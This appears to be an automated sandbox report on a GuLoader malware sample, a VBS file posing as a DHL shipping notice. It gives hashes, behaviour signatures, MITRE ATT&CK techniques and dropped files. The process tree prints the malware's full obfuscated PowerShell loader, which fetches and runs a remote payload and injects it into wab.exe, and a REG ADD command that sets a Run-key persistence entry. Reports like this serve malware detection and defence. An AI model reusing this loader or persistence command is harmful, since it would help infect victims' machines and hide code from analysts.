guloader | 014fa04a5028251ea8ed900339ff91f3a040914ef9ceb8b342d7da22aef09119

Analysis

max time kernel
121s
max time network
121s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
30/04/2024, 09:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AWBSHIPPING-DHL-46T6R9764987.vbs
Size

42KB
MD5

13c8293c8c161c3c2572a39f2591520a
SHA1

a7c9097d4fc7911db572e1be818e1b9fd6ba9a13
SHA256

014fa04a5028251ea8ed900339ff91f3a040914ef9ceb8b342d7da22aef09119
SHA512

d8add90901ccbc9b62d2a2e5a21cc316475cab94a7ae2e7c900d81a6d7ba67db6d57861d184b847f4fec19065ef76ab6e937d6eec5235051b588ed344d007c95
SSDEEP

768:y5jl4SycO0mAWbs1SDsqc59+yXs6r+aTpJZSpVXQ8hcc2gGxy7qk4aQ1DVkzP/R4:y5j+NcOZAWbs1SgR59lrBJSnX5QhxyzC

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	3004	WScript.exe
6	2920	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\Bewonder = "%Emissionsforgelsers% -w 1 $Opklaret=(Get-ItemProperty -Path 'HKCU:\\Victorianeres\\').Hrecentralen;%Emissionsforgelsers% ($Opklaret)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
1980	wab.exe
1980	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1076	powershell.exe
1980	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1076 set thread context of 1980	1076	powershell.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1084	reg.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2920	powershell.exe
1076	powershell.exe
1076	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1076	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	1076	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 3004 wrote to memory of 2920	3004	WScript.exe	28
PID 3004 wrote to memory of 2920	3004	WScript.exe	28
PID 3004 wrote to memory of 2920	3004	WScript.exe	28
PID 2920 wrote to memory of 2772	2920	powershell.exe	30
PID 2920 wrote to memory of 2772	2920	powershell.exe	30
PID 2920 wrote to memory of 2772	2920	powershell.exe	30
PID 2920 wrote to memory of 1076	2920	powershell.exe	32
PID 2920 wrote to memory of 1076	2920	powershell.exe	32
PID 2920 wrote to memory of 1076	2920	powershell.exe	32
PID 2920 wrote to memory of 1076	2920	powershell.exe	32
PID 1076 wrote to memory of 376	1076	powershell.exe	33
PID 1076 wrote to memory of 376	1076	powershell.exe	33
PID 1076 wrote to memory of 376	1076	powershell.exe	33
PID 1076 wrote to memory of 376	1076	powershell.exe	33
PID 1076 wrote to memory of 1980	1076	powershell.exe	34
PID 1076 wrote to memory of 1980	1076	powershell.exe	34
PID 1076 wrote to memory of 1980	1076	powershell.exe	34
PID 1076 wrote to memory of 1980	1076	powershell.exe	34
PID 1076 wrote to memory of 1980	1076	powershell.exe	34
PID 1076 wrote to memory of 1980	1076	powershell.exe	34
PID 1980 wrote to memory of 1552	1980	wab.exe	35
PID 1980 wrote to memory of 1552	1980	wab.exe	35
PID 1980 wrote to memory of 1552	1980	wab.exe	35
PID 1980 wrote to memory of 1552	1980	wab.exe	35
PID 1552 wrote to memory of 1084	1552	cmd.exe	37
PID 1552 wrote to memory of 1084	1552	cmd.exe	37
PID 1552 wrote to memory of 1084	1552	cmd.exe	37
PID 1552 wrote to memory of 1084	1552	cmd.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AWBSHIPPING-DHL-46T6R9764987.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Sanitetsvsenet = 1;$Pararek='S';$Pararek+='ubstrin';$Pararek+='g';Function Inventering($Klbemaskine){$Trafikminister=$Klbemaskine.Length-$Sanitetsvsenet;For($Gulix=6; $Gulix -lt $Trafikminister; $Gulix+=(7)){$Forsgsvist+=$Klbemaskine.$Pararek.Invoke( $Gulix, $Sanitetsvsenet);}$Forsgsvist;}function Tauranga($galliske){. ($Indlsningsmetodens) ($galliske);}$Doorman=Inventering ' Wri,kMIn ensoBak erzileus iImprudl ModsalChir,pa Shoot/Somewi5 Hjiso.Phonoc0graphi Geront(MindelWN,nchoiDainc.nGemmindHypergoOtos,fw Bermts No.lo ArgentN BegulT Nonac trepa1 .raic0Pa.ago.Plov,r0Roen g;.nflat StikfaWOverfliChuckfn Pecul6Unem,l4Trlban;kandi, Omfavnx Mistr6Trykke4.olida;Im,ede ElgkerBru.tovHandel:Urligu1Slankn2Aceolo1Avlsdy.Smerge0Knalle) ,xoti Rece,G IntereKoncencReallnk EchoioMis ir/ Ska n2 Rackm0.uperc1 C.pel0B,tter0Dampen1Send.e0Lissom1 ,achi Di givF AnsgtiFr gatrScorneeDisbowfRacemioHjemfaxSolbad/Effekt1Wallet2beskik1Xraybo.noncon0Humidn ';$Overstregende50=Inventering 'Exag.eUDatatrsBuffbaeIndpisrAfsmel-Hjt,alAMicrobg KamfeeRelistnTevarmt Neutr ';$Simsende=Inventering ' Redr,hSka,ehtPhilomtGenganpevocat: Spicu/versio/ aconi8 Spytn7Dec.lo. Panus1Ejendo2Preleg1Skrive.As,eon1,ntero0 genn,5Skistv.Hypod.1knav,s8Parren4Udkigv/Jetja.GTils,edAnt,denSldersi ComponPestergclavicsSupraco Ventep forkobKr.gsfeSpaitcvSoapiea Immutr.iocheiAsylrenM lticgsubmaisloveraa.ddrlanVersifl fo,tyg ,hirtgUdlaane PseudnB kerne,rning.SupervpRep,obfWelldobBrav r ';$Matzoh=Inventering 'ensoph>Infero ';$Indlsningsmetodens=Inventering 'disconi ,fgiveSpksfoxFatig ';$reallots='inby';Tauranga (Inventering ' skadeS ForureForbudtSe vis-XerodeCAfstsmoIndsnknStorsntRo.erneOverbonlute.vtaesthe sojaka-AflytnPE,rochaAnthrot He,vihGuldbr vrneplTDaiker: D isi\CraftiIunwatcnOxidertSaftfleIza ryrCo icisTabpo.tMandiga wondedGinglye milie. Arka tForbe,x,igtent Ildfa Unche-Stat sV UngusaBiavlplS alpruArnbereJhowzy Afleve$Non,ulrSa.dsfeBilbomaFortl,lOverstlTakvinoSymphytTowerss Angol;,ongel ');Tauranga (Inventering 'Vr.leriuau.orfKalibr Pi,bra(QuiltetonsetteFinanss .appetP,ttif-RgslrepMetasoaFo,svatBasilihlaical Over,rTNonpar:Milit \ hfsenIEnamornsandw.t.oxcomeKokkerrKafiz s P zzlt Liesea GreendPl,neteDisksp.SharkytHar,ypxOvercot Col.v)sistni{Cal.iseUnderfx mo.sfiKassattNonsyn} Distr; Avast ');$Formalism = Inventering 'SprngseWeekencBandolh Hulkeosk,vli Livsla%ChalotaSubadmpfilmkopdriverdTy.eaaaFakturt Rystea Overv%Halstr\NogaisDSensumvOutsinrChokkegMim.keagastrogfordjetPikemoiAlime gWeaseltAag.rk.ComplaALedeo,nLysehod.vsave Usnini&S pera&School ProteseInhibicSammenhForg aoBahurk Servan$ Sp,ni ';Tauranga (Inventering 'Shibbo$Reallng kuldelBlodspoBakt.rbTrodseaNagelfl Semiu: ,luricDitchhaTroctorTem,tibArbitro S.idenBermudaWizierrF,brikitry.hes MascamTagund=Lyngh ( Ins.rcGeologmri ualdUnre r Herre/Blgplac,exkur tokr$Qu.ridFAtlas.oTungemrShagr,m Hjkona Scle lPr,mali hapsosO.findmRhubar)Filt.r ');Tauranga (Inventering 'Unover$ Paasag nonvol eposoUnfas,b HvepsaSeponelFlyv k:Portc HSlyngeoDe,obivHystereansky,dunder,bRe nefaTegninaEjec,mrIntervnSilicie,liesdsSmir.s2Vinbje2Forcen4Resolu=Access$kramsfSFejlmuiRicciamMisstasPi.ecoeMusikun avled YukoneUnsupe.Re.elesPsilo pU.pantlPhotoii iavlet stfo(Unc.up$.roposMmonarcaSval.gt ,andlz ,ewdeoBrassahTaxich)Buk el ');$Simsende=$Hovedbaarnes224[0];Tauranga (Inventering ' Terbe$Atl.idgTestrilPorphyoInterabPauperaOptimilTripty:ObligeDA skueiMyrmecsDragtesStrmlie.ssocitfinalet UnfonlHalluceOllasamHedasheHeatm nStokast Sp,ro=LvskovNAnciene PedanwAflokk-LovemoOBenef,bDobbeljPr come L pencTofte t Cheri SylishS Ant ry Sperms,fkrimt Dat te ResedmRusk,e.HenninNVoltsieOksekdtKajsag.FejlfiW fusileUnvictb CinnaCUnderblSe,rifiTene reUnqualnSejlentUn.hif ');Tauranga (Inventering ' do.er$ enagDRangkli Lepids,dmefusMagnife AeldetPhytostSelskalMis ime Pod.imAttitueDyedednCircumtS.ryge.Ek posHDagblae Carpualle.dedProgreeEgep,rrAdeninsHut er[ timba$StatsrOSustinvSkraaneInsinurEftergs .electGrama.rSatirieTidsprg Bj rge,amaisnAls cedUnvulceReengr5kundgr0 su er] M,sfe=Syrnen$FolkemD Bo.bloIzaa.ooEnkeperFormidm ObseqaSvede.nUnplac ');$Skoleinspektrerne=Inventering 'ImpresDGaranti Arkans,nertis Dy deebiwee t C,ypttEntreplOddsideR bbinmBotry.eTopfignOutvo,tSkanke.EliminDinerudoGafl nwOestr nWheelilRtsstooDi ektaElectidFlkhamF ArnoliLaminelUnsw,aeTankvo(Athena$ ,avilSVekseliLimin m Servos huskeeRhopalnB.dervdSchi de Opliv,Acropo$ SnuptS Svb.seUndreak T,angsbrohovuEnogtya YondelCothyrpS.ormfaLedesprFag.intForldrn,repaneMahogarSakrise.agnavs ,orra)Autoc ';$Skoleinspektrerne=$carbonarism[1]+$Skoleinspektrerne;$Seksualpartneres=$carbonarism[0];Tauranga (Inventering 'S,ftfu$DrslgegM dopsl,raktoo.ibliobDiglotaLovelol rneri: rivebLSubtotaKonvermLyr.bibKursussWizardkPerispiToldasn,xperisDement=Koinci( Sago T .heepeZeroizsOdontot Und.r-S.istvPFoldniaLe anttSm evih ,ubbe Respon$NonvibST iviaeSammenk C.tolsNummeruTyndtca PanoclBur.nsp FaktuaUnmirrrSprngntBudmasnTank rehft.pir AntiseDiamagsSupp e) .octu ');while (!$Lambskins) {Tauranga (Inventering 'Paanae$ CatargSuffral G,ntlo IndicbSadocaaWedginl hornw:MarkovDSvederiBejaelcFetaoskpin,assDeckp,odimittnHustrussynerg=F.rmam$Snrelit.ocalirOverpiuPodzoleIssuel ') ;Tauranga $Skoleinspektrerne;Tauranga (Inventering 'NettooSOv,rsttdiplo,aFr mskr.algsvtSignif-Mo.itoSLanguil OpnoreAfklipeM gilopOverl Sop r4 Appar ');Tauranga (Inventering 'Distil$Bverlagnorthwl ,ilbuofogliebAntem aMicrobl Wowwo:BosiddL F,emsaSavannmprobabbNutidbsCauponkPetiteiDo shenA,ahcisskorpe=Dis.lf(Yalel,TDecaffeArabanssuperstexecut-ForespPOrthogaHelseftFoliich F ske Selsk$ Le nySWhiteneS jultkWayfarsApesiluRteblgaXiphydlmucu.ep LegalaLiddedrFascistunrifenRepubleHandspr NdrineSi.kscsR inen) Sagog ') ;Tauranga (Inventering 'Hellig$T rbidgskrammlKalkbrogarantbStentoaAfgiftlSalens:KrisetHA bdniiHillocpS edfapEskapau SkillsZiz ny= raesk$ Hen.igJacqualSodavao PreusbadmittaUnderslbr,ako:Checkuk S rafv VolumiCrustaeUnerosnPersevdSoveree Stenc+cosmos+Undual% Rista$ rmsprHChukkaoPugginv,shawsemafia.dTicklib pringaSu,staa CitrarSnickenV.nstreMilieusFel,se2Teacup2Murder4Afsved.ProgracTaxaflo Pin,eupressenPatie,tSoljen ') ;$Simsende=$Hovedbaarnes224[$Hippus];}Tauranga (Inventering 'Smreos$TyvstjgBagdellMiljv.oLedrebbMammeraSonebolLystba:AcrospBFlyvebiDiegivnDagregsEfterg Gybing=Fortro bidragGDragemeRetstitUdgift-AnlgsiCAl,bamoIdentin Opbl tB.nineesvine.n BarbetUng ms Austra$ExpatiS .olkeeMer hakCircumsM.tissuvic,coa C,nsol,elatopDyrkn.a PishorGomutitAr,hdinEmilyseTilsvirVi hele RamlesSpyts ');Tauranga (Inventering 'B vgel$ YukiagBidragl Labiao.rallybtilkalaPen,til herrs:milli SSade,mk,ftalmiG spisfRoseaft Tolvte Maveds unf.epMicrogoWheyfarTrimk,sTelete .endt=Therap Redn n[em.ersSMonum,yIndskrs Psycht,yrerneInterbmFallos.OmrediCMetaxyo LagrinJ rnbavstyr.dePseudorCigarrtAdultd]Bicorp:Stjgen:BlubbiFKurm grAestheoBag ipmvivarvBTanekaaGokketsGennemeLandlo6Typhoi4TrykfeS HjredtvarmblrSlogani Sunfin ternegJourna( Fdrel$PkgsinB Aquati Komm nQua,hes Spruk)dagsku ');Tauranga (Inventering 'Photop$Cass,mg ,aukelFnikeroVersewbAvlshiaAmer.clSmelte: HugtnWTomogrrBestseiVltepetfortroh P imryHanrej Forrid=Myoneu Gifte[IntercS Ophthy KaffesGennemtTarv,leMortimmTrustd. Tig rT,nsheaeCo fesxAf.okktS.ineb.ornithEAntresninterfctoxic,oUdspecd hartkiOttomanRehi,egAvou.y] Semun:F,aade:SugarsA,agmanSLuvespC MyxovIEringoIPrerev.FuldvgG Irrefe As,ert Po tsSaut.not deantrGe.epdiDbefonndimittg Br ch(Hausto$IngungSSmakkekC alouishort f,nderbtSienreeJor.fssFunktipP ograoLa rymrM,elfasChirke),hevre ');Tauranga (Inventering 'Mil,ia$NonintgDemodulElgtyroRistafbSansedaIndbril onpri:S,egesK NitriiJeoparkBillaraBranch2Han.sk6 .umec= D via$ S.rfeWGavotnrLdrepaiMutesttRes.crh erity Exsti.ExodoisAuramiuMonismbSeacocsClassltPterogrun,imiiPeasann Masclg Bakse(Omis i3Unsens2Matine5Stouti0Hvorn.3 T gne8lignos,gaskr 2 ,ynte8Counte3Tenori0Kom un1 Bndsl)Mutati ');Tauranga $Kika26;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2920
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dvrgagtigt.And && echo $"
    3⤵
    PID:2772
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sanitetsvsenet = 1;$Pararek='S';$Pararek+='ubstrin';$Pararek+='g';Function Inventering($Klbemaskine){$Trafikminister=$Klbemaskine.Length-$Sanitetsvsenet;For($Gulix=6; $Gulix -lt $Trafikminister; $Gulix+=(7)){$Forsgsvist+=$Klbemaskine.$Pararek.Invoke( $Gulix, $Sanitetsvsenet);}$Forsgsvist;}function Tauranga($galliske){. ($Indlsningsmetodens) ($galliske);}$Doorman=Inventering ' Wri,kMIn ensoBak erzileus iImprudl ModsalChir,pa Shoot/Somewi5 Hjiso.Phonoc0graphi Geront(MindelWN,nchoiDainc.nGemmindHypergoOtos,fw Bermts No.lo ArgentN BegulT Nonac trepa1 .raic0Pa.ago.Plov,r0Roen g;.nflat StikfaWOverfliChuckfn Pecul6Unem,l4Trlban;kandi, Omfavnx Mistr6Trykke4.olida;Im,ede ElgkerBru.tovHandel:Urligu1Slankn2Aceolo1Avlsdy.Smerge0Knalle) ,xoti Rece,G IntereKoncencReallnk EchoioMis ir/ Ska n2 Rackm0.uperc1 C.pel0B,tter0Dampen1Send.e0Lissom1 ,achi Di givF AnsgtiFr gatrScorneeDisbowfRacemioHjemfaxSolbad/Effekt1Wallet2beskik1Xraybo.noncon0Humidn ';$Overstregende50=Inventering 'Exag.eUDatatrsBuffbaeIndpisrAfsmel-Hjt,alAMicrobg KamfeeRelistnTevarmt Neutr ';$Simsende=Inventering ' Redr,hSka,ehtPhilomtGenganpevocat: Spicu/versio/ aconi8 Spytn7Dec.lo. Panus1Ejendo2Preleg1Skrive.As,eon1,ntero0 genn,5Skistv.Hypod.1knav,s8Parren4Udkigv/Jetja.GTils,edAnt,denSldersi ComponPestergclavicsSupraco Ventep forkobKr.gsfeSpaitcvSoapiea Immutr.iocheiAsylrenM lticgsubmaisloveraa.ddrlanVersifl fo,tyg ,hirtgUdlaane PseudnB kerne,rning.SupervpRep,obfWelldobBrav r ';$Matzoh=Inventering 'ensoph>Infero ';$Indlsningsmetodens=Inventering 'disconi ,fgiveSpksfoxFatig ';$reallots='inby';Tauranga (Inventering ' skadeS ForureForbudtSe vis-XerodeCAfstsmoIndsnknStorsntRo.erneOverbonlute.vtaesthe sojaka-AflytnPE,rochaAnthrot He,vihGuldbr vrneplTDaiker: D isi\CraftiIunwatcnOxidertSaftfleIza ryrCo icisTabpo.tMandiga wondedGinglye milie. Arka tForbe,x,igtent Ildfa Unche-Stat sV UngusaBiavlplS alpruArnbereJhowzy Afleve$Non,ulrSa.dsfeBilbomaFortl,lOverstlTakvinoSymphytTowerss Angol;,ongel ');Tauranga (Inventering 'Vr.leriuau.orfKalibr Pi,bra(QuiltetonsetteFinanss .appetP,ttif-RgslrepMetasoaFo,svatBasilihlaical Over,rTNonpar:Milit \ hfsenIEnamornsandw.t.oxcomeKokkerrKafiz s P zzlt Liesea GreendPl,neteDisksp.SharkytHar,ypxOvercot Col.v)sistni{Cal.iseUnderfx mo.sfiKassattNonsyn} Distr; Avast ');$Formalism = Inventering 'SprngseWeekencBandolh Hulkeosk,vli Livsla%ChalotaSubadmpfilmkopdriverdTy.eaaaFakturt Rystea Overv%Halstr\NogaisDSensumvOutsinrChokkegMim.keagastrogfordjetPikemoiAlime gWeaseltAag.rk.ComplaALedeo,nLysehod.vsave Usnini&S pera&School ProteseInhibicSammenhForg aoBahurk Servan$ Sp,ni ';Tauranga (Inventering 'Shibbo$Reallng kuldelBlodspoBakt.rbTrodseaNagelfl Semiu: ,luricDitchhaTroctorTem,tibArbitro S.idenBermudaWizierrF,brikitry.hes MascamTagund=Lyngh ( Ins.rcGeologmri ualdUnre r Herre/Blgplac,exkur tokr$Qu.ridFAtlas.oTungemrShagr,m Hjkona Scle lPr,mali hapsosO.findmRhubar)Filt.r ');Tauranga (Inventering 'Unover$ Paasag nonvol eposoUnfas,b HvepsaSeponelFlyv k:Portc HSlyngeoDe,obivHystereansky,dunder,bRe nefaTegninaEjec,mrIntervnSilicie,liesdsSmir.s2Vinbje2Forcen4Resolu=Access$kramsfSFejlmuiRicciamMisstasPi.ecoeMusikun avled YukoneUnsupe.Re.elesPsilo pU.pantlPhotoii iavlet stfo(Unc.up$.roposMmonarcaSval.gt ,andlz ,ewdeoBrassahTaxich)Buk el ');$Simsende=$Hovedbaarnes224[0];Tauranga (Inventering ' Terbe$Atl.idgTestrilPorphyoInterabPauperaOptimilTripty:ObligeDA skueiMyrmecsDragtesStrmlie.ssocitfinalet UnfonlHalluceOllasamHedasheHeatm nStokast Sp,ro=LvskovNAnciene PedanwAflokk-LovemoOBenef,bDobbeljPr come L pencTofte t Cheri SylishS Ant ry Sperms,fkrimt Dat te ResedmRusk,e.HenninNVoltsieOksekdtKajsag.FejlfiW fusileUnvictb CinnaCUnderblSe,rifiTene reUnqualnSejlentUn.hif ');Tauranga (Inventering ' do.er$ enagDRangkli Lepids,dmefusMagnife AeldetPhytostSelskalMis ime Pod.imAttitueDyedednCircumtS.ryge.Ek posHDagblae Carpualle.dedProgreeEgep,rrAdeninsHut er[ timba$StatsrOSustinvSkraaneInsinurEftergs .electGrama.rSatirieTidsprg Bj rge,amaisnAls cedUnvulceReengr5kundgr0 su er] M,sfe=Syrnen$FolkemD Bo.bloIzaa.ooEnkeperFormidm ObseqaSvede.nUnplac ');$Skoleinspektrerne=Inventering 'ImpresDGaranti Arkans,nertis Dy deebiwee t C,ypttEntreplOddsideR bbinmBotry.eTopfignOutvo,tSkanke.EliminDinerudoGafl nwOestr nWheelilRtsstooDi ektaElectidFlkhamF ArnoliLaminelUnsw,aeTankvo(Athena$ ,avilSVekseliLimin m Servos huskeeRhopalnB.dervdSchi de Opliv,Acropo$ SnuptS Svb.seUndreak T,angsbrohovuEnogtya YondelCothyrpS.ormfaLedesprFag.intForldrn,repaneMahogarSakrise.agnavs ,orra)Autoc ';$Skoleinspektrerne=$carbonarism[1]+$Skoleinspektrerne;$Seksualpartneres=$carbonarism[0];Tauranga (Inventering 'S,ftfu$DrslgegM dopsl,raktoo.ibliobDiglotaLovelol rneri: rivebLSubtotaKonvermLyr.bibKursussWizardkPerispiToldasn,xperisDement=Koinci( Sago T .heepeZeroizsOdontot Und.r-S.istvPFoldniaLe anttSm evih ,ubbe Respon$NonvibST iviaeSammenk C.tolsNummeruTyndtca PanoclBur.nsp FaktuaUnmirrrSprngntBudmasnTank rehft.pir AntiseDiamagsSupp e) .octu ');while (!$Lambskins) {Tauranga (Inventering 'Paanae$ CatargSuffral G,ntlo IndicbSadocaaWedginl hornw:MarkovDSvederiBejaelcFetaoskpin,assDeckp,odimittnHustrussynerg=F.rmam$Snrelit.ocalirOverpiuPodzoleIssuel ') ;Tauranga $Skoleinspektrerne;Tauranga (Inventering 'NettooSOv,rsttdiplo,aFr mskr.algsvtSignif-Mo.itoSLanguil OpnoreAfklipeM gilopOverl Sop r4 Appar ');Tauranga (Inventering 'Distil$Bverlagnorthwl ,ilbuofogliebAntem aMicrobl Wowwo:BosiddL F,emsaSavannmprobabbNutidbsCauponkPetiteiDo shenA,ahcisskorpe=Dis.lf(Yalel,TDecaffeArabanssuperstexecut-ForespPOrthogaHelseftFoliich F ske Selsk$ Le nySWhiteneS jultkWayfarsApesiluRteblgaXiphydlmucu.ep LegalaLiddedrFascistunrifenRepubleHandspr NdrineSi.kscsR inen) Sagog ') ;Tauranga (Inventering 'Hellig$T rbidgskrammlKalkbrogarantbStentoaAfgiftlSalens:KrisetHA bdniiHillocpS edfapEskapau SkillsZiz ny= raesk$ Hen.igJacqualSodavao PreusbadmittaUnderslbr,ako:Checkuk S rafv VolumiCrustaeUnerosnPersevdSoveree Stenc+cosmos+Undual% Rista$ rmsprHChukkaoPugginv,shawsemafia.dTicklib pringaSu,staa CitrarSnickenV.nstreMilieusFel,se2Teacup2Murder4Afsved.ProgracTaxaflo Pin,eupressenPatie,tSoljen ') ;$Simsende=$Hovedbaarnes224[$Hippus];}Tauranga (Inventering 'Smreos$TyvstjgBagdellMiljv.oLedrebbMammeraSonebolLystba:AcrospBFlyvebiDiegivnDagregsEfterg Gybing=Fortro bidragGDragemeRetstitUdgift-AnlgsiCAl,bamoIdentin Opbl tB.nineesvine.n BarbetUng ms Austra$ExpatiS .olkeeMer hakCircumsM.tissuvic,coa C,nsol,elatopDyrkn.a PishorGomutitAr,hdinEmilyseTilsvirVi hele RamlesSpyts ');Tauranga (Inventering 'B vgel$ YukiagBidragl Labiao.rallybtilkalaPen,til herrs:milli SSade,mk,ftalmiG spisfRoseaft Tolvte Maveds unf.epMicrogoWheyfarTrimk,sTelete .endt=Therap Redn n[em.ersSMonum,yIndskrs Psycht,yrerneInterbmFallos.OmrediCMetaxyo LagrinJ rnbavstyr.dePseudorCigarrtAdultd]Bicorp:Stjgen:BlubbiFKurm grAestheoBag ipmvivarvBTanekaaGokketsGennemeLandlo6Typhoi4TrykfeS HjredtvarmblrSlogani Sunfin ternegJourna( Fdrel$PkgsinB Aquati Komm nQua,hes Spruk)dagsku ');Tauranga (Inventering 'Photop$Cass,mg ,aukelFnikeroVersewbAvlshiaAmer.clSmelte: HugtnWTomogrrBestseiVltepetfortroh P imryHanrej Forrid=Myoneu Gifte[IntercS Ophthy KaffesGennemtTarv,leMortimmTrustd. Tig rT,nsheaeCo fesxAf.okktS.ineb.ornithEAntresninterfctoxic,oUdspecd hartkiOttomanRehi,egAvou.y] Semun:F,aade:SugarsA,agmanSLuvespC MyxovIEringoIPrerev.FuldvgG Irrefe As,ert Po tsSaut.not deantrGe.epdiDbefonndimittg Br ch(Hausto$IngungSSmakkekC alouishort f,nderbtSienreeJor.fssFunktipP ograoLa rymrM,elfasChirke),hevre ');Tauranga (Inventering 'Mil,ia$NonintgDemodulElgtyroRistafbSansedaIndbril onpri:S,egesK NitriiJeoparkBillaraBranch2Han.sk6 .umec= D via$ S.rfeWGavotnrLdrepaiMutesttRes.crh erity Exsti.ExodoisAuramiuMonismbSeacocsClassltPterogrun,imiiPeasann Masclg Bakse(Omis i3Unsens2Matine5Stouti0Hvorn.3 T gne8lignos,gaskr 2 ,ynte8Counte3Tenori0Kom un1 Bndsl)Mutati ');Tauranga $Kika26;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1076
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dvrgagtigt.And && echo $"
      4⤵
      PID:376
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of WriteProcessMemory
      PID:1980
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bewonder" /t REG_EXPAND_SZ /d "%Emissionsforgelsers% -w 1 $Opklaret=(Get-ItemProperty -Path 'HKCU:\Victorianeres\').Hrecentralen;%Emissionsforgelsers% ($Opklaret)"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1552
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bewonder" /t REG_EXPAND_SZ /d "%Emissionsforgelsers% -w 1 $Opklaret=(Get-ItemProperty -Path 'HKCU:\Victorianeres\').Hrecentralen;%Emissionsforgelsers% ($Opklaret)"
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:1084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF4E.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar10BE.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF71.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Roaming\Dvrgagtigt.And

Filesize
460KB

MD5
7dc212a0d75a61e830886261ff643133

SHA1
3cd39998df24510987f99b6ffbd87334ff229ab5

SHA256
8af47344b98fdae0b08df9afe15cb27847971ee697318e2c5fdcf37a102291e6

SHA512
